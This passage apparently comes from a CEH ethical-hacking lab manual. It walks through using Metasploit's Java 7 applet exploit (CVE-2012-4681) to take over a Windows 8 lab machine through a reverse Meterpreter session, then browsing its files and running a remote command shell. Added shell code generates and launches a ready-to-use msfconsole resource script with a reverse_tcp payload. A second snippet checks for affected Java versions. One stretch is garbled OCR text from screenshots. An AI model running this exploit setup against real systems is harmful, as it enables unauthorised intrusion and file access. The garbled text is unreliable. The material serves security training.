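The same configuration as steps 20 to 22, but driven from msfconsole through a resource script instead of the web interface, as an added example that is not from the lab manual. It assumes, since the page only shows the GUI, that the "Java 7 Applet Remote Code Execution" entry is the module exploit/multi/browser/java_jre17_exec and that its options are named SRVHOST, SRVPORT, URIPATH, LHOST, LPORT and TARGET; the values 10.0.0.10, port 8080 and the URI path greetings are the lab's own. The launch helper additionally assumes msfconsole is on PATH.

```shell
#!/bin/sh
# Added example (not from the lab manual): the msfconsole equivalent of
# steps 20-22, emitted as a Metasploit resource script. Assumed, not taken
# from the page: the GUI entry "Java 7 Applet Remote Code Execution" is the
# module exploit/multi/browser/java_jre17_exec and its options are named
# SRVHOST, SRVPORT, URIPATH, LHOST, LPORT and TARGET (0 = Generic Java
# payload). 10.0.0.10, 8080 and "greetings" are the lab's own values.

# Returns 0 if $1 is a dotted-quad IPv4 address with octets in 0-255.
is_ipv4() {
    old_ifs=$IFS
    IFS=.
    set -- $1
    IFS=$old_ifs
    [ $# -eq 4 ] || return 1
    for octet in "$@"; do
        case $octet in ''|*[!0-9]*) return 1 ;; esac
        [ "$octet" -le 255 ] || return 1
    done
    return 0
}

# Prints the resource script on stdout.
#   $1 = address Metasploit listens on (used for both SRVHOST and LHOST)
#   $2 = URI path the applet is served from (default: greetings)
#   $3 = port for the reverse Meterpreter connection (default: 4444)
build_java_jre17_rc() {
    host=$1
    uripath=${2:-greetings}
    lport=${3:-4444}
    if ! is_ipv4 "$host"; then
        echo "build_java_jre17_rc: not an IPv4 address: '$host'" >&2
        return 1
    fi
    cat <<EOF
use exploit/multi/browser/java_jre17_exec
set TARGET 0
set SRVHOST $host
set SRVPORT 8080
set URIPATH $uripath
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST $host
set LPORT $lport
exploit -j
EOF
}

# Writes the script to a file and starts msfconsole with it (-q quiet,
# -r resource file). Assumes msfconsole is on PATH; defined, never called.
launch_java_jre17() {
    build_java_jre17_rc "$@" > java_jre17.rc || return 1
    msfconsole -q -r java_jre17.rc
}
```

The "exploit -j" line runs the module as a background job, which is how the web interface runs browser exploits too: the server keeps serving http://10.0.0.10:8080/greetings and every browser that loads the applet with an affected JRE produces its own reverse session.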
Like most browser exploits, this module is designed to run in the background on the attacking system: set URIPATH if you want to control which URL is used to host the exploit, and SRVPORT to change the listening port. Target Settings shows Generic (Java Payload) with a Meterpreter payload.

IPv6 is the latest version of the Internet Protocol, designed by the Internet Engineering Task Force to replace the current version, IPv4. The implementation of IPv6 predominantly impacts addressing, routing, security, and services.

FIGURE 3.20: Metasploit Running Module

23. The task is started as shown in the following screenshot.

In Metasploit Pro, you can define IPv6 addresses for target hosts. For example, when you perform a discovery scan, scan a web application, execute a bruteforce attack, or run a module, you can define an IPv6 address for the target hosts. For modules, Metasploit Pro provides several payloads that provide IPv6 support for Windows x86, Linux x86, BSD x86, PHP, and cmd.

FIGURE 3.21: Metasploit Task Started

24. Now switch to the Windows 8 virtual machine, launch the Chrome browser, enter http://10.0.0.10:8080/greetings in the address bar, and press Enter.

25. Click Run this time on the "Java(TM) was blocked because it is out of date" prompt in the Chrome browser.
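Why the lab pins the target to JRE 7u6 and why Chrome calls the plug-in out of date, as an added shell example that is not from the lab manual: the Oracle alert quoted above covers Java SE 7 in browsers, and the assumption made here (not stated on the page) is that Java SE 7 Update 7 is the first release carrying the fix, so versions 1.7.0 through 1.7.0_06 count as affected. The function takes the first line that java -version prints; the version strings used in the test are constructed, and local_java_affected assumes a java binary on PATH.

```shell
#!/bin/sh
# Added example, not part of the lab manual. Decide whether a Java runtime,
# identified by the first line that `java -version` prints, falls in the
# range the Oracle Security Alert for CVE-2012-4681 covers.
# Assumption (not stated on the page): Java SE 7 Update 7 is the first
# fixed release, so 1.7.0 through 1.7.0_06 are affected; Java 6 is not
# affected by this particular issue, per the alert quoted in the lab.

# $1 = a version line such as:  java version "1.7.0_06"
# Returns 0 if affected, 1 if not (including Java 6 and Java 8 or later),
# 2 if no quoted version string could be parsed out of the line.
java7_affected_by_cve_2012_4681() {
    ver=$(printf '%s\n' "$1" | sed -n 's/.*"\([0-9][0-9._]*\)".*/\1/p' | head -n 1)
    [ -n "$ver" ] || return 2
    major=${ver%%.*}                 # "1"  for 1.7.0_06
    rest=${ver#*.}                   # "7.0_06"
    minor=${rest%%.*}                # "7"
    case $ver in
        *_*) update=${ver##*_} ;;    # "06"
        *)   update=0 ;;             # 1.7.0 GA carries no update number
    esac
    update=$(printf '%s\n' "$update" | sed 's/^0*//')   # "06" -> "6"
    [ -n "$update" ] || update=0
    [ "$major" = 1 ] && [ "$minor" = 7 ] && [ "$update" -le 6 ]
}

# Convenience wrapper for the machine this runs on. Assumes a java binary
# on PATH; `java -version` writes to stderr, hence the 2>&1.
local_java_affected() {
    java7_affected_by_cve_2012_4681 "$(java -version 2>&1 | head -n 1)"
}
```

Run local_java_affected on the Windows 8 target (from a POSIX shell such as Git Bash, or port the same string handling to PowerShell) before starting the exploit: if it returns 1 the applet will load but never yield a session, and the first thing to check is whether a newer JRE was installed alongside 7u6, which is exactly why the requirements list says to remove every other JRE.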
Note: Metasploit Pro does not support IPv6 for link-local broadcast discovery, social engineering, or pivoting. However, you can import IPv6 addresses from a text file or you can manually add them to your project. If you import IPv6 addresses from a text file, you must separate each address with a new line.

FIGURE 3.22: Windows 8 Virtual Machine - Running the Exploit

26. Now switch to your Windows Server 2012 host machine and check the Metasploit task pane. Metasploit will start capturing the reverse connection from the target machine.

Project Management: A Metasploit Pro project contains the penetration test that you want to run. A project defines the target systems, network boundaries, modules, and web campaigns that you want to include in the penetration test. Additionally, within a project, you can use discovery scan to identify target systems and bruteforce to gain access to systems.

FIGURE 3.23: Metasploit Capturing the reverse connection of the targeted machine

27. Click the Sessions tab to view the captured connection of the target machine.

User Management: Administrators can assign user roles to manage the level of access that the user has to projects and administrative tasks. You can manage user accounts from the Administration menu.

FIGURE 3.24: Metasploit Session tab

28. Click the captured session to view the information of the target machine as shown in the following screenshot.

Global Settings: Global settings define settings that all projects use. You can access global settings from the Administration menu. From the global settings, you can set the payload type for the modules and enable access to the diagnostic console through a web browser. Additionally, from global settings, you can create API keys, post-exploitation macros, persistent listeners, and Nexpose Consoles.

FIGURE 3.25: Metasploit Captured Session of a Target Machine

29. You can view the information of the target machine; the session entry lists the target's address, the session type (Meterpreter), its age, and the attack module that created it (JAVA_JRE17_EXEC).
System Management: As an administrator, you can update the license key and perform software updates. You can access the system management tools from the Administration menu.

FIGURE 3.26: Metasploit Target Machine System information

Host Scan: A host scan identifies vulnerable systems within the target network range that you define. When you perform a scan, Metasploit Pro provides information about the services, vulnerabilities, and captured evidence for hosts that the scan discovers. Additionally, you can add vulnerabilities, notes, tags, and tokens to identified hosts.

30. To access the files of the target system, click Access Filesystem. The session page lists the available actions: Collect System Data (evidence and sensitive data such as screenshots, passwords, and system information), Access Filesystem (browse, upload, download, and delete files), Command Shell (interact with a remote command shell on the target; advanced users), Create Proxy Pivot (pivot attacks using the remote host as a gateway, TCP/UDP), and Terminate Session (close the session; further interaction requires exploitation).

Bruteforce uses a large number of user name and password combinations to attempt to gain access to a host. Metasploit Pro provides preset bruteforce profiles that you can use to customize attacks for a specific environment. If you have a list of credentials that you want to use, you can import the credentials into the system.

FIGURE 3.27: Metasploit Accessing Filesystem of a Target Machine

31. You can view and modify the files from the target machine.
  • 28. M odule 12 - H ackin g W e b servers M ffc fik rtK it If a bruteforce is successful, Metasploit Pro opens a session on die target system. You can take control of die session dirough a command shell or Meterpreter session. If there is an open session, you can collect system data, access die remote file system, pivot attacks and traffic, and run postexploitation modules. Modules expose and exploit vulnerabilities and security flaws in target systems. Metasploit Pro offers access to a comprehensive library of exploit modules, auxiliary modules, and postexploitation modules. You can run automated exploits or manual exploits. Automated exploitation uses die minimum reliability option to determine the set of exploits to run against die target systems. You cannot select die modules or define evasion options diat Metasploit Pro uses. C E H Lab Manual Page 757 1M01? PA'tptcht%m. '1,iothVdn ,ti o o » t 'p-iia di. • f i r v SS»C6 aM 4 lp0 St i yW W Uye Stm s LStm »ye3 82 LX *4 P 1 L‫«־‬ &s l t T© *e n -sa oC al a LV i« L _ Ga*t mo Wl* m S AS tS { •n *s I I asc sah st >■» ■« ■ [■ •S M T L•M i CN , hM _•u •ty c L*‫׳‬W *• 9 V _fag ro -n Qw.i baf lx 971EIly 0DB3 t C9 2 24 ‫־‬Oal* Ktb M a □M e Mf x pe W ' LRb UH W PO f* Pfva1 rM l* er ‫י‬ n cre ar t » 10 7 2 1 4 a 6 7 1 8 ‫9גנ‬ 1 2 jie -b s 22-03U 04194T 15930C 221552C 0--18U 1 135T 1 2--03U 00931C 15 94T 21 221552C 0--16U 1 135T 1 22-03U 00931C 15 94T 1 229821C 0--07U 10192T 2215.3U 0--1.0C 11145T 1 22-03U 0-19.7C 15 3 T 09 5 2--03U 00930C 15 94T 21 22-O.1C 0-1f3 U 15 t3 T 09 < 22915U 0-112T 10239C 2215fS7C 0--1 1T 1 14 U 1 t 22-03U 0-19* T 15 35C 09 225931C 0--00U 1019ST 22003B 0-075T 11901C 229050C 0--06U 10195T 22-O4T 0-1f30C 15 t3U 09 22-09U 00192T 1590' C 225931C 0--03U 10194T 22-01U 00195T 15914C 22-09U 00192T 15900C 22.931C 04 03U 15 94T 1 22503U 04.931C 11 •5T 1 22414U 0.011 T 1 4 ®C 1 229H2T 0-.2fl UC 10 i 1 225U7B 0-.911C 14 3T 1 ?04‫מנז‬st 0 4 0 au « ‫ .ו‬c 220SMT O11SM 1 -0 U C I*2S84 U 0--26 T 1I11V 4 C C 
FIGURE 3.28: Metasploit Modifying Filesystem of a Target Machine

32. You can also launch a command shell of the target machine by clicking Command Shell from the sessions captured.

FIGURE 3.29: Metasploit Launching Command Shell of Target Machine

33. To view the system IP address and other information through the command shell in Metasploit, type ipconfig /all and press Enter.
Manual exploitation provides granular control over the exploits that you run against the target systems. You run one exploit at a time, and you can choose the modules and evasion options that you want to use.

FIGURE 3.30: Metasploit IPCONFIG command for Target Machine

Social engineering exploits client-side vulnerabilities. You perform social engineering through a campaign. A campaign uses e-mail to perform phishing attacks against target systems. To create a campaign, you must set up a web server, e-mail account, list of target e-mails, and e-mail template.

34. The following screenshot shows the IP address and other details of your target machine.

WebScan spiders web pages and applications for active content and forms. If the WebScan identifies active content, you can audit the content for vulnerabilities, and then exploit the vulnerabilities after Metasploit Pro discovers them.

FIGURE 3.31: Metasploit Target Machine IP Address in Metasploit Command Shell

35. Click the Go back one page button in the Metasploit browser to exit the command shell.
A task chain is a series of tasks that you can automate to follow a specific schedule. The Metasploit Web UI provides an interface that you can use to set up a task chain and an interactive clock and calendar that you can use to define the schedule.

A report provides comprehensive results from a penetration test. Metasploit Pro provides several types of standard reports that range from high-level, general overviews to detailed report findings. You can generate a report in PDF, Word, XML, and HTML.

FIGURE 3.32: Metasploit closing command shell

FIGURE 3.33: Metasploit Terminating Session

You can use reports to compare findings between different tests or different systems. Reports provide details on compromised hosts, executed modules, cracked passwords, cracked SMB hashes, discovered SSH keys, discovered services, collected evidence, and web campaigns.

37. It will display Session Killed. Now from the Account drop-down list, select Logout.

FIGURE 3.34: Metasploit Session Killed and Logging out
Lab Analysis

Analyze and document the results related to the lab exercise. Give your opinion on your target's security posture and exposure.

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Tool/Utility: Metasploit Framework
Information Collected/Objectives Achieved:
Output: Interface Information
  - Name: eth4 - Microsoft Hyper-V Network Adapter
  - Hardware MAC: 00:00:00:00:00:00
  - MTU: 1500
  - IPv4 Address: 10.0.0.12
  - IPv4 Netmask: 255.255.255.0
  - IPv6 Address: fe80::b9ea:d011:3e0e:1b7
  - IPv6 Netmask: ffff:ffff:ffff:ffff:ffff::

Questions
1. How would you create an initial user account from a remote system?
2. Describe one or more vulnerabilities that Metasploit can exploit.

Internet Connection Required: [ ] Yes  [x] No
Platform Supported: [x] Classroom  [x] iLabs